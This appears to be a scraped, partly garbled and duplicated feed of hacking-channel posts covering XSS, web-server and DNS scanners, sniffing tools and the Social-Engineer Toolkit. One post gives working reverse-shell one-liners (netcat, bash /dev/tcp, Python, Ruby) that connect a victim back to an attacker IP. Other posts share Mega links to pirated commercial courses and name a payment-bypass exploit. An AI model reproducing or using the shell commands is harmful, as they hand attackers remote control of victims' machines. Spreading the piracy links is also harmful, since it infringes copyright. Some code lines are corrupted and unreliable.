β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Most advanced XSS scanner 8k stars :
FEATURES :
Reflected and DOM XSS scanning
Multi-threaded crawling
Context analysis
Configurable core
WAF detection & evasion
Outdated JS lib scanning
Intelligent payload generator
Handmade HTML & JavaScript parser
Powerful fuzzing engine
Blind XSS support
Highly researched work-flow
Complete HTTP support
Bruteforce payloads from a file
Powered by Photon, Zetanize and Arjun
Payload Encoding
π¦Os :
> debians (kali-parrot-ubuntu...)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/s0md3v/XSStrike
2οΈβ£cd XSStrike
2οΈβ£python xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
[--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
[--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]
MORE USAGES :
4οΈβ£Scan a single URL
Option: -u or --url
5οΈβ£Test a single webpage which uses GET method.
python xsstrike.py -u "http://example.com/search.php?q=query"
6οΈβ£Supplying POST data
python xsstrike.py -u "http://example.com/search.php" --data "q=query"
7οΈβ£Testing URL path components
Option: --path
8οΈβ£Want to inject payloads in the URL path like http://example.com/search/<payload>, you can do that with --path switch.
python xsstrike.py -u "http://example.com/search/form/query" --path
9οΈβ£Treat POST data as JSON
Option: --json
This switch can be used to test JSON data via POST method.
python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"} --json'
πCrawling
Option: --crawl
For more type -h
β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Most advanced XSS scanner 8k stars :
FEATURES :
Reflected and DOM XSS scanning
Multi-threaded crawling
Context analysis
Configurable core
WAF detection & evasion
Outdated JS lib scanning
Intelligent payload generator
Handmade HTML & JavaScript parser
Powerful fuzzing engine
Blind XSS support
Highly researched work-flow
Complete HTTP support
Bruteforce payloads from a file
Powered by Photon, Zetanize and Arjun
Payload Encoding
π¦Os :
> debians (kali-parrot-ubuntu...)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/s0md3v/XSStrike
2οΈβ£cd XSStrike
2οΈβ£python xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
[--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
[--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]
MORE USAGES :
4οΈβ£Scan a single URL
Option: -u or --url
5οΈβ£Test a single webpage which uses GET method.
python xsstrike.py -u "http://example.com/search.php?q=query"
6οΈβ£Supplying POST data
python xsstrike.py -u "http://example.com/search.php" --data "q=query"
7οΈβ£Testing URL path components
Option: --path
8οΈβ£Want to inject payloads in the URL path like http://example.com/search/<payload>, you can do that with --path switch.
python xsstrike.py -u "http://example.com/search/form/query" --path
9οΈβ£Treat POST data as JSON
Option: --json
This switch can be used to test JSON data via POST method.
python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"} --json'
πCrawling
Option: --crawl
For more type -h
β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - s0md3v/XSStrike: Most advanced XSS scanner.
Most advanced XSS scanner. Contribute to s0md3v/XSStrike development by creating an account on GitHub.
π¦Review and Manage the SAP MRP List -244 MB
https://www.linkedin.com/learning/review-and-manage-the-sap-mrp-list
https://mega.nz/#F!vs9D3K5R!9Lg6-Qf5hb-7-T-Oe-j01Q
https://www.linkedin.com/learning/review-and-manage-the-sap-mrp-list
https://mega.nz/#F!vs9D3K5R!9Lg6-Qf5hb-7-T-Oe-j01Q
LinkedIn
Review and Manage the SAP MRP List Online Class | LinkedIn Learning, formerly Lynda.com
Learn how to review and manage SAP material requirements planning (MRP) lists: a key information source for anyone involved in inventory control and manufacturing.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#5G Cellular Attacks
- [ENISA THREAT LANDSCAPE FOR 5G NETWORKS](https://github.com/W00t3k/Awesome-CellularHacking/blob/master/ENISA%20threat%20landscape%20for%205G%20Networks.pdf)
- [Protecting the 4G and 5G Cellular PagingProtocols against Security and Privacy Attacks](https://www.degruyter.com/downloadpdf/j/popets.2020.2020.issue-1/popets-2020-0008/popets-2020-0008.pdf)
- [Insecure Connection Bootstrapping in Cellular Networks: The Root of All Evil](https://relentless-warrior.github.io/wp-content/uploads/2019/05/wisec19-preprint.pdf)
- [5GReasoner: A Property-Directed Security and Privacy Analysis Framework for 5G Cellular Network Protocol](https://relentless-warrior.github.io/wp-content/uploads/2019/10/5GReasoner.pdf)
- [QCSniper - A tool For capture 2g-4g air traffic using qualcomm phones ](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/)
- [Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information](http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE-torpedo-NDSS19.pdf)
- [New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols ](https://arxiv.org/pdf/1905.07617.pdf)
- [New Vulnerabilities in 5G Networks](https://threatpost.com/5g-security-flaw-mitm-targeted-attacks/147073/)
- [Side Channel Analysis in 4G and 5G Cellular Networks](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf)
- [5G NR Jamming, Spoofing, and Sniffing](https://github.com/W00t3k/Awesome-Cellular-Hacking/blob/master/5gjam.pdf)
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#5G Cellular Attacks
- [ENISA THREAT LANDSCAPE FOR 5G NETWORKS](https://github.com/W00t3k/Awesome-CellularHacking/blob/master/ENISA%20threat%20landscape%20for%205G%20Networks.pdf)
- [Protecting the 4G and 5G Cellular PagingProtocols against Security and Privacy Attacks](https://www.degruyter.com/downloadpdf/j/popets.2020.2020.issue-1/popets-2020-0008/popets-2020-0008.pdf)
- [Insecure Connection Bootstrapping in Cellular Networks: The Root of All Evil](https://relentless-warrior.github.io/wp-content/uploads/2019/05/wisec19-preprint.pdf)
- [5GReasoner: A Property-Directed Security and Privacy Analysis Framework for 5G Cellular Network Protocol](https://relentless-warrior.github.io/wp-content/uploads/2019/10/5GReasoner.pdf)
- [QCSniper - A tool For capture 2g-4g air traffic using qualcomm phones ](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/)
- [Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information](http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE-torpedo-NDSS19.pdf)
- [New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols ](https://arxiv.org/pdf/1905.07617.pdf)
- [New Vulnerabilities in 5G Networks](https://threatpost.com/5g-security-flaw-mitm-targeted-attacks/147073/)
- [Side Channel Analysis in 4G and 5G Cellular Networks](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf)
- [5G NR Jamming, Spoofing, and Sniffing](https://github.com/W00t3k/Awesome-Cellular-Hacking/blob/master/5gjam.pdf)
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
De Gruyter
Independent academic publisher dedicated to high-caliber scholarship from around the world β since 1749.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#DNS Reconnassaince :
1οΈβ£DNSRECON
* [dnsrecon](https://github.com/darkoperator/dnsrecon) - DNS Enumeration Script created by Carlos Perez (darkoperator)
2οΈβ£Reverse lookup for IP range:
>
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#DNS Reconnassaince :
1οΈβ£DNSRECON
* [dnsrecon](https://github.com/darkoperator/dnsrecon) - DNS Enumeration Script created by Carlos Perez (darkoperator)
2οΈβ£Reverse lookup for IP range:
./dnsrecon.rb -t rvs -i 10.1.1.1,10.1.1.50
3οΈβ£Retrieve standard DNS records:./dnsrecon.rb -t std -d example.com
4οΈβ£Enumerate subdornains:./dnsrecon.rb -t brt -d example.com -w hosts.txt
5οΈβ£DNS zone transfer:./dnsrecon -d example.com -t axfr
6οΈβ£Parsing NMAP Reverse DNS Lookup>
nmap -R -sL -Pn -dns-servers dns svr ip range | awk '{if( ($1" "$2" "$3)=="NMAP scan report")print$5" "$6}' | sed 's/(//g' | sed 's/)//g' dns.txt
@UndercodeTesting@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - darkoperator/dnsrecon: DNS Enumeration Script
DNS Enumeration Script. Contribute to darkoperator/dnsrecon development by creating an account on GitHub.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Netcat Linux Reverse Shell :
1οΈβ£
888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
2οΈβ£ Netcat Linux Reverse Shell
888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
3οΈβ£ Using Bash
5οΈβ£ Using Ruby
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Netcat Linux Reverse Shell :
1οΈβ£
nc 10.10.10.10 888 -e /bin/sh
10.10.10.10 is the IP address of the machine you want the victim to connect to.888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
2οΈβ£ Netcat Linux Reverse Shell
nc 10.10.10.10 888 -e cmd.exe
10.10.10.10 is the IP address of the machine you want the victim to connect to.888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
3οΈβ£ Using Bash
bash -i & /dev/tcp/10.10.10.10/888 0 &1
4οΈβ£ Using Pythonpython -c 'import socket, subprocess, os; s=socket. socket (socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(l,1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);' 5οΈβ£ Using Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'
@UndercodeTesting@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Build your first Microservices application using Go and gRPC (Golang) β1.36 GBβ
https://www.udemy.com/course/microservices-go-grpc/
https://mega.nz/folder/tMJSgALb#ud27D8Fy-uYWgCPLdX69PA
π¦Build your first Microservices application using Go and gRPC (Golang) β1.36 GBβ
https://www.udemy.com/course/microservices-go-grpc/
https://mega.nz/folder/tMJSgALb#ud27D8Fy-uYWgCPLdX69PA
Udemy
Build your first Microservices application using Go and gRPC
Get a hands on head start in the world of Microservices using cutting-edge tech like Go & gRPC
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
#Useful SNMP Commands
1οΈβ£Search for Windows installed software
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
#Useful SNMP Commands
1οΈβ£Search for Windows installed software
smpwalk !grep hrSWinstalledName
2οΈβ£ Search for Windows userssnmpwalk ip 1.3 lgrep --.1.2.25 -f4
3οΈβ£ Search for Windows running servicessnrnpwalk -c public -v1 ip 1 lgrep hrSWRJnName !cut -d" " -f4
4οΈβ£ Search for Windows open TCP portssmpwalk lgrep tcpConnState !cut -d" " -f6 !sort -u
> git sourcesβ β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated web server scanner :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/sullo/nikto
# Main script is in program/
2οΈβ£cd nikto/program
# Run using the shebang interpreter
3οΈβ£./nikto.pl -h http://www.example.com
# Run using perl (if you forget to chmod)
4οΈβ£perl nikto.pl -h http://www.example.com
π¦Run as a Docker container:
1οΈβ£git clone https://github.com/sullo/nikto.git
2οΈβ£cd nikto
3οΈβ£docker build -t sullo/nikto .
# Call it without arguments to display the full help
4οΈβ£docker run --rm sullo/nikto
# Basic usage
5οΈβ£docker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:
6οΈβ£docker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated web server scanner :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/sullo/nikto
# Main script is in program/
2οΈβ£cd nikto/program
# Run using the shebang interpreter
3οΈβ£./nikto.pl -h http://www.example.com
# Run using perl (if you forget to chmod)
4οΈβ£perl nikto.pl -h http://www.example.com
π¦Run as a Docker container:
1οΈβ£git clone https://github.com/sullo/nikto.git
2οΈβ£cd nikto
3οΈβ£docker build -t sullo/nikto .
# Call it without arguments to display the full help
4οΈβ£docker run --rm sullo/nikto
# Basic usage
5οΈβ£docker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:
6οΈβ£docker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - sullo/nikto: Nikto web server scanner
Nikto web server scanner. Contribute to sullo/nikto development by creating an account on GitHub.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
important hackers terms :
1οΈβ£arpspoof
redirect packets from a target host (or all hosts) on the LAN
intended for another local host by forging ARP replies. this
is an extremely effective way of sniffing traffic on a switch.
kernel IP forwarding (or a userland program which accomplishes
the same, e.g. fragroute πmust be turned on ahead of time.
2οΈβ£dnsspoof
forge replies to arbitrary DNS address / pointer queries on
the LAN. this is useful in bypassing hostname-based access
controls, or in implementing a variety of man-in-the-middle
attacks (HTTP, HTTPS, SSH, Kerberos, etc).
3οΈβ£dsniff
password sniffer. handles FTP, Telnet, SMTP, HTTP, POP,
poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP
MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ,
Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec
pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL,Net, Sybase
and Microsoft SQL auth info.
4οΈβ£ dsniff automatically detects and minimally parses each
application protocol, only saving the interesting bits, and
uses Berkeley DB as its output file format, only logging
unique authentication attempts. full TCP/IP reassembly is
provided by libnids(3) (likewise for the following tools as
well).
5οΈβ£filesnarf
saves selected files sniffed from NFS traffic in the current
working directory.
6οΈβ£macof
flood the local network with random MAC addresses (causing
some switches to fail open in repeating mode, facilitating
sniffing). a straight C port of the original Perl Net::RawIP
macof program.
7οΈβ£mailsnarf
a fast and easy way to violate the Electronic Communications
Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs
selected messages sniffed from SMTP and POP traffic in Berkeley
mbox format, suitable for offline browsing with your favorite
mail reader (mail -f, pine, etc.).
8οΈβ£msgsnarf
record selected messages from sniffed AOL Instant Messenger,
ICQ 2000, IRC, and Yahoo! Messenger chat sessions.
9οΈβ£sshmitm
SSH monkey-in-the-middle. proxies and sniffs SSH traffic
redirected by dnsspoof(8), capturing SSH password logins, and
optionally hijacking interactive sessions. only SSH protocol
version 1 is (or ever will be) supported - this program is far
too evil already.
πsshow
SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2
traffic, identifying authentication attempts, the lengths of
passwords entered in interactive sessions, and command line
lengths.
1οΈβ£1οΈβ£tcpkill
kills specified in-progress TCP connections (useful for
libnids-based applications which require a full TCP 3-whs for
TCB creation).
1οΈβ£2οΈβ£tcpnice
slow down specified TCP connections via "active" traffic
shaping. forges tiny TCP window advertisements, and optionally
ICMP source quench replies.
1οΈβ£3οΈβ£urlsnarf
output selected URLs sniffed from HTTP traffic in CLF
(Common Log Format, used by almost all web servers), suitable
for offline post-processing with your favorite web log
analysis tool (analog, wwwstat, etc.).
1οΈβ£4οΈβ£webmitm
HTTP / HTTPS monkey-in-the-middle. transparently proxies and
sniffs web traffic redirected by dnsspoof(8), capturing most
"secure" SSL-encrypted webmail logins and form submissions.
1οΈβ£5οΈβ£webspy
sends URLs sniffed from a client to your local Netscape
browser for display, updated in real-time (as the target
surfs, your browser surfs along with them, automagically).
a fun party trick.
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
important hackers terms :
1οΈβ£arpspoof
redirect packets from a target host (or all hosts) on the LAN
intended for another local host by forging ARP replies. this
is an extremely effective way of sniffing traffic on a switch.
kernel IP forwarding (or a userland program which accomplishes
the same, e.g. fragroute πmust be turned on ahead of time.
2οΈβ£dnsspoof
forge replies to arbitrary DNS address / pointer queries on
the LAN. this is useful in bypassing hostname-based access
controls, or in implementing a variety of man-in-the-middle
attacks (HTTP, HTTPS, SSH, Kerberos, etc).
3οΈβ£dsniff
password sniffer. handles FTP, Telnet, SMTP, HTTP, POP,
poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP
MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ,
Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec
pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL,Net, Sybase
and Microsoft SQL auth info.
4οΈβ£ dsniff automatically detects and minimally parses each
application protocol, only saving the interesting bits, and
uses Berkeley DB as its output file format, only logging
unique authentication attempts. full TCP/IP reassembly is
provided by libnids(3) (likewise for the following tools as
well).
5οΈβ£filesnarf
saves selected files sniffed from NFS traffic in the current
working directory.
6οΈβ£macof
flood the local network with random MAC addresses (causing
some switches to fail open in repeating mode, facilitating
sniffing). a straight C port of the original Perl Net::RawIP
macof program.
7οΈβ£mailsnarf
a fast and easy way to violate the Electronic Communications
Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs
selected messages sniffed from SMTP and POP traffic in Berkeley
mbox format, suitable for offline browsing with your favorite
mail reader (mail -f, pine, etc.).
8οΈβ£msgsnarf
record selected messages from sniffed AOL Instant Messenger,
ICQ 2000, IRC, and Yahoo! Messenger chat sessions.
9οΈβ£sshmitm
SSH monkey-in-the-middle. proxies and sniffs SSH traffic
redirected by dnsspoof(8), capturing SSH password logins, and
optionally hijacking interactive sessions. only SSH protocol
version 1 is (or ever will be) supported - this program is far
too evil already.
πsshow
SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2
traffic, identifying authentication attempts, the lengths of
passwords entered in interactive sessions, and command line
lengths.
1οΈβ£1οΈβ£tcpkill
kills specified in-progress TCP connections (useful for
libnids-based applications which require a full TCP 3-whs for
TCB creation).
1οΈβ£2οΈβ£tcpnice
slow down specified TCP connections via "active" traffic
shaping. forges tiny TCP window advertisements, and optionally
ICMP source quench replies.
1οΈβ£3οΈβ£urlsnarf
output selected URLs sniffed from HTTP traffic in CLF
(Common Log Format, used by almost all web servers), suitable
for offline post-processing with your favorite web log
analysis tool (analog, wwwstat, etc.).
1οΈβ£4οΈβ£webmitm
HTTP / HTTPS monkey-in-the-middle. transparently proxies and
sniffs web traffic redirected by dnsspoof(8), capturing most
"secure" SSL-encrypted webmail logins and form submissions.
1οΈβ£5οΈβ£webspy
sends URLs sniffed from a client to your local Netscape
browser for display, updated in real-time (as the target
surfs, your browser surfs along with them, automagically).
a fun party trick.
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Social-Engineer Toolkit 2020 updated :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£
> Linux
>Mac OS X (experimental)
6οΈβ£Full usage see this pdf-if you beginer :
>
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Social-Engineer Toolkit 2020 updated :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£
git clone https://github.com/trustedsec/social-engineer-
2οΈβ£toolkit/ setoolkit/
3οΈβ£cd setoolkit
4οΈβ£pip3 install -r requirements.txt
5οΈβ£python setup.py
π¦OS :> Linux
>Mac OS X (experimental)
6οΈβ£Full usage see this pdf-if you beginer :
>
https://github.com/trustedsec/social-engineer-toolkit/raw/master/readme/User_Manual.pdf
@UndercodeTesting@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦A Java based HTTP/HTTPS proxy
> for assessing web application vulnerability.
>It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦A Java based HTTP/HTTPS proxy
> for assessing web application vulnerability.
>It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.
for Windows-Linux-Mac :@UndercodeTesting
> https://sourceforge.net/projects/paros/files/latest/download
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What this β οΈ project can do in hacking ?
> Download :
>Fragments - extracts Scripts and HTML comments from HTML pages as they are seen via the proxy, or other plugins
>Proxy - observes traffic between the browser and the web server. The WebScarab proxy is able to observe both HTTP and encrypted HTTPS traffic, by negotiating an SSL connection between WebScarab and the browser instead of simply connecting the browser to the server and allowing an encrypted stream to pass through it. Various proxy plugins have also been developed to allow the operator to control the requests and responses that pass through the proxy.
> Manual intercept - allows the user to modify HTTP and HTTPS requests and responses on the fly, before they reach the server or browser.
>Beanshell - allows for the execution of arbitrarily complex operations on requests and responses. Anything that can be expressed in Java can be executed.
>Reveal hidden fields - sometimes it is easier to modify a hidden field in the page itself, rather than intercepting the request after it has been sent. This plugin simply changes all hidden fields found in HTML pages to text fields, making them visible, and editable.
Bandwidth simulator - allows the user to emulate a slower network, in order to observe how their website would perform when accessed over, say, a modem.
>Spider - identifies new URLs on the target site, and fetches them on command.
>Manual request - Allows editing and replay of previous requests, or creation of entirely new requests.
SessionID analysis - collects and analyzes a number of cookies to visually determine the degree of randomness and unpredictability. Note that this analysis is rather trivial, and does not do any serious checks, such as FIPS, etc.
>Scripted - operators can use BeanShell (or any other BSF supported language found on the classpath) to write a script to create requests and fetch them from the server. The script can then perform some analysis on the responses, with all the power of the WebScarab Request and Response object model to simplify things.
>Parameter fuzzer - performs automated substitution of parameter values that are likely to expose incomplete parameter validation, leading to vulnerabilities like Cross Site Scripting (XSS) and SQL Injection.
>Search - allows the user to craft arbitrary BeanShell expressions to identify conversations that should be shown in the list.
Compare - calculates the edit distance between the response bodies of the conversations observed, and a selected baseline conversation. The edit distance is "the number of edits required to transform one document into another". For performance reasons, edits are calculated using word tokens, rather than byte by byte.
>SOAP - There is a plugin that parses WSDL, and presents the various functions and the required parameters, allowing them to be edited before being sent to the server. NOTE: This plugin is deprecated, and may be removed in the future. SOAPUI is streets beyond anything that Webscarab can do, or will ever do, and is
>Extensions - automates checks for files that were mistakenly left in web server's root directory (e.g. .bak, ~, etc). Checks are performed for both, files and directories (e.g. /app/login.jsp will be checked for /app/login.jsp.bak, /app/login.jsp~, /app.zip, /app.tar.gz, etc). Extensions for files and directories can be edited by user.
>XSS/CRLF - passive analysis plugin that searches for user-controlled data in HTTP response headers and body to identify potential CRLF injection (HTTP response splitting) and reflected cross-site scripting (XSS) vulnerabilities.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What this β οΈ project can do in hacking ?
> Download :
https://wiki.owasp.org/index.php/Category:OWASP_WebScarab_Project
FEATURES :>Fragments - extracts Scripts and HTML comments from HTML pages as they are seen via the proxy, or other plugins
>Proxy - observes traffic between the browser and the web server. The WebScarab proxy is able to observe both HTTP and encrypted HTTPS traffic, by negotiating an SSL connection between WebScarab and the browser instead of simply connecting the browser to the server and allowing an encrypted stream to pass through it. Various proxy plugins have also been developed to allow the operator to control the requests and responses that pass through the proxy.
> Manual intercept - allows the user to modify HTTP and HTTPS requests and responses on the fly, before they reach the server or browser.
>Beanshell - allows for the execution of arbitrarily complex operations on requests and responses. Anything that can be expressed in Java can be executed.
>Reveal hidden fields - sometimes it is easier to modify a hidden field in the page itself, rather than intercepting the request after it has been sent. This plugin simply changes all hidden fields found in HTML pages to text fields, making them visible, and editable.
Bandwidth simulator - allows the user to emulate a slower network, in order to observe how their website would perform when accessed over, say, a modem.
>Spider - identifies new URLs on the target site, and fetches them on command.
>Manual request - Allows editing and replay of previous requests, or creation of entirely new requests.
SessionID analysis - collects and analyzes a number of cookies to visually determine the degree of randomness and unpredictability. Note that this analysis is rather trivial, and does not do any serious checks, such as FIPS, etc.
>Scripted - operators can use BeanShell (or any other BSF supported language found on the classpath) to write a script to create requests and fetch them from the server. The script can then perform some analysis on the responses, with all the power of the WebScarab Request and Response object model to simplify things.
>Parameter fuzzer - performs automated substitution of parameter values that are likely to expose incomplete parameter validation, leading to vulnerabilities like Cross Site Scripting (XSS) and SQL Injection.
>Search - allows the user to craft arbitrary BeanShell expressions to identify conversations that should be shown in the list.
Compare - calculates the edit distance between the response bodies of the conversations observed, and a selected baseline conversation. The edit distance is "the number of edits required to transform one document into another". For performance reasons, edits are calculated using word tokens, rather than byte by byte.
>SOAP - There is a plugin that parses WSDL, and presents the various functions and the required parameters, allowing them to be edited before being sent to the server. NOTE: This plugin is deprecated, and may be removed in the future. SOAPUI is streets beyond anything that Webscarab can do, or will ever do, and is
>Extensions - automates checks for files that were mistakenly left in web server's root directory (e.g. .bak, ~, etc). Checks are performed for both, files and directories (e.g. /app/login.jsp will be checked for /app/login.jsp.bak, /app/login.jsp~, /app.zip, /app.tar.gz, etc). Extensions for files and directories can be edited by user.
>XSS/CRLF - passive analysis plugin that searches for user-controlled data in HTTP response headers and body to identify potential CRLF injection (HTTP response splitting) and reflected cross-site scripting (XSS) vulnerabilities.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Process Visualization with HMI / SCADA (PLC III) β4.03 GBβ
https://www.udemy.com/course/hmi-scada/
https://mega.nz/folder/faZFEIpa#fakaZBlX0KfHPG0fKQgilQ
π¦ Process Visualization with HMI / SCADA (PLC III) β4.03 GBβ
https://www.udemy.com/course/hmi-scada/
https://mega.nz/folder/faZFEIpa#fakaZBlX0KfHPG0fKQgilQ
Udemy
Process Visualization (Level 3)
Learn HMI / SCADA hands-on by developing your own live interfaces for a running system.
Magento_WooCommerce_CardGate_Payment_Gateway_2_0_30_Payment_Process.php
6.5 KB
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Vulnerable Servers :
> There are a series of vulnerable web applications that you can use to practice your skills in a safe environment. You can get more information about them in the [vulnerable_servers directory in this repository](https://github.com/The-Art-of-Hacking/art-of-hacking/tree/master/vulnerable_servers).
#How to Integrate OWASP ZAP with Jenkins :
-You can integrate ZAP with Jenkins and even automatically create Jira issues based on your findings. You can download the [ZAP plug in here](https://wiki.jenkins.io/display/JENKINS/zap+plugin).
-[This video](https://www.youtube.com/watch?v=mmHZLSffCUg) provides an overview of how to integrate
#Docker Security
- [OWASP Docker security resources](https://github.com/OWASP/Docker-Security)
- [Docker Bench for Security](https://github.com/docker/docker-bench-security)
- [Dockerscan](https://github.com/cr0hn/dockerscan)
- [Docker Security Playground](https://github.com/giper45/DockerSecurityPlayground)
#Javascript Tools :
* [Retire.js](https://retirejs.github.io/retire.js)
>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Vulnerable Servers :
> There are a series of vulnerable web applications that you can use to practice your skills in a safe environment. You can get more information about them in the [vulnerable_servers directory in this repository](https://github.com/The-Art-of-Hacking/art-of-hacking/tree/master/vulnerable_servers).
#How to Integrate OWASP ZAP with Jenkins :
-You can integrate ZAP with Jenkins and even automatically create Jira issues based on your findings. You can download the [ZAP plug in here](https://wiki.jenkins.io/display/JENKINS/zap+plugin).
-[This video](https://www.youtube.com/watch?v=mmHZLSffCUg) provides an overview of how to integrate
#Docker Security
- [OWASP Docker security resources](https://github.com/OWASP/Docker-Security)
- [Docker Bench for Security](https://github.com/docker/docker-bench-security)
- [Dockerscan](https://github.com/cr0hn/dockerscan)
- [Docker Security Playground](https://github.com/giper45/DockerSecurityPlayground)
#Javascript Tools :
* [Retire.js](https://retirejs.github.io/retire.js)
>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
h4cker/vulnerable_servers at master Β· The-Art-of-Hacking/h4cker
This repository is primarily maintained by Omar Santos (@santosomar) and includes thousands of resources related to ethical hacking, bug bounties, digital forensics and incident response (DFIR), ar...
Working with Android Tools and Testing [
β-657β
https://www.pluralsight.com/courses/android-tools-testing
https://mega.nz/#F!ptxVQRzZ!N4jRKcMHP9_ScG5l9vE3uQ
β-657β
https://www.pluralsight.com/courses/android-tools-testing
